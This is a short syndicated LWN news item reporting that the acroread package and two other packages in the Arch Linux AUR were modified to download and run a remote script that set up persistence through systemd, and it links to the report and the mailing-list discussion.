Malware found in the Arch Linux AUR repository

Post Syndicated from corbet original https://lwn.net/Articles/759461/rss

Here’s a
report in Sensors Tech Forum
on the discovery of a set of hostile
packages in the Arch Linux AUR repository system. AUR contains
user-contributed packages, of course; it’s not a part of the Arch distribution
itself. “The security investigation shows that shows that a
malicious user with the nick name xeactor modified in June 7 an orphaned
package (software without an active maintainer) called acroread. The
changes included a curl script that downloads and runs a script from a
remote site. This installs a persistent software that reconfigures systemd
in order to start periodically. While it appears that they are not a
serious threat to the security of the infected hosts, the scripts can be
manipulated at any time to include arbitrary code. Two other packages were
modified in the same manner.
This
thread
in the aur-general list shows the timeline of the discovery and
response.